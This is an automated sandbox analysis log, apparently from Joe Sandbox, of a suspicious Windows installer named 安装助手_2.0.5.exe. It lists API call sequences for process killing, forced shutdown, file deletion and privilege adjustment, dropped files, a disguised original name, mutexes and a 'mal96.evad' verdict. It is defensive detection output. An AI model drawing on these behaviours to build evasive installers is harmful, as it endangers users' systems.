Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C513A6A
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C511950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6C511950
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C514754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6C514754
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C514754
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C524A27
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C691880
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C696A43
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6F6CE0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C746D10
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C764DE0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74EEF0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C71AEEF
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6E2EC9
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6C8EA1
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C764870
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C756820
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73E810
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75C8D0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C714896
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6C8972
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C758950
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75A930
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C76A91A
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C746900
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C766999
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C720A52
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C76AA00
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C754AA0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6E0B66
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6D0BCA
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75EBC0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73AB90
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74E4D0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7284AC
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C754489
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C732521
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C758520
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7445D0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74C580
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C742580
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75E600
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7646C0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C72C7F3
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6CC7CF
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7667C0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7567A0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C740020
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74E0E0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C758200
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75C2A0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C743D50
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C717D43
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C765D90
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C749E80
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C721F11
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7578C8
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73589F
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7499F0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73FA50
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73DAD0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C741AA0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6E540A
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C70F5EC
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74F5C0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C73B650
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C75F640
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7496E0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C769700
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7637C0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74F050
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C6E3092
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C7471F0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74D280
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C74D380
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C756AF0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C753750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008681EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B8240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00894250
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00898650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00870943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00898C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008AD089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008810AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A5180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B1120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008253CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008853F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0086D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BD470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B1550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00821572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008AD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00879652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008297CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00839766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00821AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0083E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008C2300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0088E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008966D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BE990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0087AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0088B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B7200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008AF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0084B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00897410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008AF420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008BF599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008C351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B3530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008C3601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00893790
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008B77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0084F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0083BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00873AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0083BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_008A7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0089FDF0
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00821E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 008228E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 008BFB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: String function: 6C6C9240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: String function: 6C766F10 appears 728 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000000.1420215618.0000000000FC9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002EAE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F52A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal96.evad.winEXE@140/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C695D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C695D60
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00829313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00829313
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00833D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00833D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00829252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_00829252
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C695240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,7_2_6C695240
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\is-IOBOI.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4932:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2340:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4424:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
